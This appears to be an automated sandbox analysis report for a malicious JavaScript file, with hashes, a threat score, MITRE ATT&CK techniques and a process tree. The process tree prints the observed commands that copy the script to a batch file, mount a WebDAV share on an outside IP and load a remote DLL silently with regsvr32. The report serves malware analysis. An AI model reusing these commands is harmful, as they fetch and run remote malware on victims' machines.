cb462b49abcef692e8e03cea05a1442da8e066eb0eda3c0a2b16ffd793bb3933

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
09/07/2024, 08:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

289260722354814603.js
Size

5KB
MD5

6f7a2336c04c7952fb3c4bf88b321bee
SHA1

467c91cdf139a836b27d6c62860da4525d856d63
SHA256

cb462b49abcef692e8e03cea05a1442da8e066eb0eda3c0a2b16ffd793bb3933
SHA512

fb172fb9810c8e39b00b6a0931ed54705406a8dc5ab0fd46dd9bc6cd9b3cdd7331f8cbb10ec8a42ca1b1f4f15f2de0e67171a41f3b9759b6ea237d4c1023c3aa
SSDEEP

96:9HSuauBdekMEjuHFQxtWO0AoDNwiHv6H2Lk5+:VSnnGjuHFcwO0RDNwiPa2Lk5+

Score

7^/10

execution

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-771719357-2485960699-3367710044-1000\Control Panel\International\Geo\Nation	wscript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2996 wrote to memory of 2152	2996	wscript.exe	82
PID 2996 wrote to memory of 2152	2996	wscript.exe	82
PID 2152 wrote to memory of 4516	2152	cmd.exe	85
PID 2152 wrote to memory of 4516	2152	cmd.exe	85
PID 2152 wrote to memory of 3208	2152	cmd.exe	87
PID 2152 wrote to memory of 3208	2152	cmd.exe	87

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\289260722354814603.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2996
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\289260722354814603.js" "C:\Users\Admin\\frctcd.bat" && "C:\Users\Admin\\frctcd.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2152
- - C:\Windows\system32\net.exe
    net use \\45.9.74.13@8888\DavWWWRoot\
    3⤵
    PID:4516
- - C:\Windows\system32\regsvr32.exe
    regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\215.dll
    3⤵
    PID:3208

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\frctcd.bat

Filesize
5KB

MD5
6f7a2336c04c7952fb3c4bf88b321bee

SHA1
467c91cdf139a836b27d6c62860da4525d856d63

SHA256
cb462b49abcef692e8e03cea05a1442da8e066eb0eda3c0a2b16ffd793bb3933

SHA512
fb172fb9810c8e39b00b6a0931ed54705406a8dc5ab0fd46dd9bc6cd9b3cdd7331f8cbb10ec8a42ca1b1f4f15f2de0e67171a41f3b9759b6ea237d4c1023c3aa

Download Submit